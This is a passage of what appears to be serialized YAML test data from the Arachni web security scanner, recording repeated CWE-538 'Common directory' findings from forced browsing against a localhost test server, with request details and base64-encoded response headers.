!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/bin/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/bin/
injected: bin
id: bin
elem: path
remarks: {}
method: ''
response: bin
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/Admin_files/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/Admin_files/
injected: Admin_files
id: Admin_files
elem: path
remarks: {}
method: ''
response: Admin_files
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/credit/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/credit/
injected: credit
id: credit
elem: path
remarks: {}
method: ''
response: credit
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/public/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/public/
injected: public
id: public
elem: path
remarks:
:stuff:
- Blah
- Blah2
method: ''
response: public
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/dbase/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/dbase/
injected: dbase
id: dbase
elem: path
remarks: {}
method: ''
response: dbase
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/priv/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/priv/
injected: priv
id: priv
elem: path
remarks: {}
method: ''
response: priv
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/customer/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/customer/
injected: customer
id: customer
elem: path
remarks: {}
method: ''
response: customer
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/asp/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/asp/
injected: asp
id: asp
elem: path
remarks: {}
method: ''
response: asp
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/customers/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/customers/
injected: customers
id: customers
elem: path
remarks: {}
method: ''
response: customers
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/pw/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/pw/
injected: pw
id: pw
elem: path
remarks: {}
method: ''
response: pw
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mg==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/java/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/java/
injected: java
id: java
elem: path
remarks: {}
method: ''
response: java
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/zipfiles/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/zipfiles/
injected: zipfiles
id: zipfiles
elem: path
remarks: {}
method: ''
response: zipfiles
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/job/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/job/
injected: job
id: job
elem: path
remarks: {}
method: ''
response: job
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/jrun/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/jrun/
injected: jrun
id: jrun
elem: path
remarks: {}
method: ''
response: jrun
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/admin/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/admin/
injected: admin
id: admin
elem: path
remarks: {}
method: ''
response: admin
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
